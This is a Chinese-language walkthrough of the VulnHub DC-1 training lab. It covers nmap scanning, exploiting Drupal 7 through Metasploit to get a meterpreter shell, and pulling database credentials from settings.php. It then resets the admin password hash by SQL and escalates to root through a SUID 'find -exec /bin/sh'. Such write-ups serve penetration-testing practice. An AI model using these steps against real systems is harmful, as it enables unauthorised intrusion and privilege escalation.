DC-1靶机攻略

2023-10-04 19:31:04

靶机地址

https://www.vulnhub.com/entry/dc-1-1,292/
DC-1.zip (Size: 733 MB)
Download: http://www.five86.com/downloads/DC-1.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-1.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-1.zip.torrent ( Magnet)

靶机描述

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

信息收集

攻击机地址：192.168.0.102
靶机地址：192.168.0.119
任务目标：根据靶机描述有5个flag需要获取。

首先NMAP进行探测，nmap -sP 192.168.0.0/24 确定靶机IP为192.168.0.119，进行全端口探测：nmap -A -p- -v 192.168.0.119

发现开放22、80、111端口，先打开80查看页面，根据nmap结果可知当前运行的是Drupal 7的CMS

漏洞利用及提权

搜索Drupal 7的漏洞发现其实可利用的漏洞蛮多的

进入msf后搜索Drupal进行利用

使用show options看下要设置的内容,需要设置目标IPset RHOSTS 192.168.0.119设置攻击机IP set LHOST 192.168.0.102接着run获取 meterpreter 会话：

获取会话后先搞个shell

再用
python3 -c 'import pty;pty.spawn("/bin/bash")
export TERM=xterm
搞成交互式shell，然后就发现当前目录下存在flag1.txt,提示我们查看配置文件：

经过搜索知道drupal配置文件存放路径为 sites/default/settings.php
查看文件发现flag2,发现数据库账户口令，那就尝试连接下数据库

成功连接数据库后在drupal库中发现user表，然后在user中发现了账户密码

发现admin账号和经过加密的密码，drupal常用密码加密是MD5格式，但是7.0以后因为安全性问题将加密方式改成了hash加密，由于很多在线MD5爆破和MD5数据库，可以查到很多MD5码的原文，所以Drupal 7已不再采用简单的MD5加密，而是采用一种新型的Hash加密方法，新型加密方法是加盐MD5码，这里不是MD5，应该是Drupal 7是自定义的加密方式。结合flag2 的提示暴力破解不是唯一的方式，那这里爆破也可以，也可以去采用其他方式，如尝试重置密码、添加新的管理员（从searchsploit结果中可知有添加管理员漏洞）等
这里采用重置密码的方式，Drupal 7 的密码hash脚本存放于script目录下的password-hash.sh

通过php scripts/password-hash.sh 123 创建123的hash，接下来再hash密码更新进user表中

通过命令更新密码：update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;，更新密码后使用admin/123进行登录，在content发现flag3

这里的关键词是 PERMS、FIND、passwd、-exec、shadow
查看/etc/passwd 发现flag4用户

然后再flag4的用户目录下发现flag4.txt

根据提示我们要提权至root去找最后的flag了,使用find命令查找有特殊权限suid的命令：find / -perm -4000

再使用find 命令进行提权：find ./misc -exec "/bin/sh" \;

获取root 权限，然后在root目录下发现thefinalflag.txt